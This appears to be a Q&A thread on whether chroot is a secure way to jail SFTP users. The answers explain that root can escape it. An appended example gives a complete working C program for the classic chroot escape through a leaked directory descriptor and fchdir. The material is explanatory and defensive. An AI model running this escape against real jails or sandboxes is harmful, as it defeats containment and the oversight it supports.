
I've been playing around with a CentOS box for a couple of years now, so I'm pretty comfy with the terminal. However, I read a lot of blog posts claiming that chroot is insecure, and the number of those posts frightens me. Is it really so? Why?

I use chroot to lock down SFTP-only users in a specific context, without any shell or commands at all. So really, what is the security problem with that?

This question was exiled from StackOverflow.

3 Answers


Because, in most instances, a root process can easily exit the chroot. This is by design, as chroot was never intended as a security device.

Alan Cox somewhat famously berated a developer who submitted a kernel patch to "fix" this behavior, pointing out that chroot has been abused as a security device but was never intended to be one.

MDMarra

I know at least one example of why it is considered to be insecure. In a chroot environment, /proc isn't isolated, so it's fairly easy to access resources not owned by processes started in your chroot.

Using a chrooted environment for SFTP is fine and improves the level of security significantly. Just don't abuse it as container-based virtualization, which does provide more levels of security. In this, I underline what's in @MDMarra's answer.

gertvdijk

Whenever an adversary gains superuser access within a chroot environment, there are several ways to escape from the jail. One is based on the fact that not all file descriptors are closed when calling chroot(). A simple C program could be written that exploits this fact. More restrictive solutions than chroot exist, such as virtualization. However, chroot offers a simple and straightforward way to restrict processes and their abilities.

NicoKowe
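The escape that MDMarra's and NicoKowe's answers describe, written out as an added example that is not code from any of the answers above: a root process keeps a directory descriptor that was opened before chroot(), uses fchdir() to get back outside the new root, climbs with chdir("..") until ".." stops moving (the kernel only clamps ".." at the root when the walk starts under it), and finally calls chroot(".") to make the real root its root again. It assumes Linux, a jail directory passed on the command line (any empty directory will do), and root or CAP_SYS_CHROOT; without that privilege chroot() itself is refused and the program reports that instead of escaping.

```c
/* Added example, not from the original answers: the classic chroot escape
 * via a descriptor that survives chroot(). Build and run on Linux as root:
 *   gcc -Wall -o chroot_escape chroot_escape.c
 *   mkdir /tmp/jail && sudo ./chroot_escape /tmp/jail   (jail path is an assumption) */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Returns 1 when "." and ".." are the same directory (the root the process
 * is allowed to see), 0 when ".." leads somewhere else, -1 on error. Inside
 * a chroot this stops at the jail root; outside it, at the real "/". */
int at_filesystem_root(void)
{
    struct stat here, up;
    if (stat(".", &here) != 0 || stat("..", &up) != 0)
        return -1;
    return here.st_dev == up.st_dev && here.st_ino == up.st_ino;
}

/* chdir("..") until ".." stops moving. Returns the number of steps taken,
 * or -1 on error; max_steps keeps it from spinning on an odd filesystem. */
int climb_to_root(int max_steps)
{
    int steps = 0;
    for (;;) {
        int r = at_filesystem_root();
        if (r < 0) return -1;
        if (r) return steps;
        if (steps == max_steps || chdir("..") != 0) return -1;
        steps++;
    }
}

/* Enter jail_dir with chroot(), then get back out using a descriptor that
 * was opened before the call. Return values:
 *   0  escaped: the root directory is the real "/" again
 *   1  chroot() worked but the escape did not
 *   2  the caller lacks CAP_SYS_CHROOT, so no jail was entered
 *  -1  jail_dir is unusable (missing, not a directory, ...) */
int jail_and_escape(const char *jail_dir)
{
    /* The descriptor chroot() does not close: it refers to the directory we
     * are in right now and keeps referring to it after the root has moved. */
    int outside_fd = open(".", O_RDONLY | O_DIRECTORY);
    if (outside_fd < 0)
        return -1;

    if (chroot(jail_dir) != 0) {
        int saved = errno;
        close(outside_fd);
        return saved == EPERM ? 2 : -1;
    }
    /* A careful jailer also does chdir("/") so the cwd is inside the jail;
     * do the same to show the escape works even then. */
    if (chdir("/") != 0) { close(outside_fd); return 1; }

    /* Step 1: jump to the directory the saved descriptor points at. The
     * kernel does not check whether it lies under the current root. */
    if (fchdir(outside_fd) != 0) { close(outside_fd); return 1; }
    close(outside_fd);

    /* Step 2: the cwd is outside the root now, so chdir("..") is never
     * clamped at the jail boundary; keep going until the real "/". */
    if (climb_to_root(64) < 0)
        return 1;

    /* Step 3: make the real root the root directory again. */
    if (chroot(".") != 0)
        return 1;
    return 0;
}

int main(int argc, char **argv)
{
    if (argc != 2) {
        fprintf(stderr, "usage: %s <jail-dir>   (needs root)\n", argv[0]);
        return 2;
    }
    int rc = jail_and_escape(argv[1]);
    switch (rc) {
    case 0:
        /* An empty jail has no /etc/passwd; seeing one proves the root
         * directory is the host's again. */
        printf("escaped; /etc/passwd %s\n",
               access("/etc/passwd", R_OK) == 0 ? "is readable" : "is not visible");
        break;
    case 1:  puts("chroot() succeeded but the escape failed"); break;
    case 2:  puts("not privileged: chroot() refused, nothing to escape"); break;
    default: perror(argv[1]);
    }
    return rc;
}
```

This is also why the SFTP setup in the question is still sound: both chroot() calls in the escape need CAP_SYS_CHROOT, and a chrooted SFTP session runs as the unprivileged user, so the same program run as that user stops at "not privileged". The danger is a root process, or a privilege escalation to root, inside the jail.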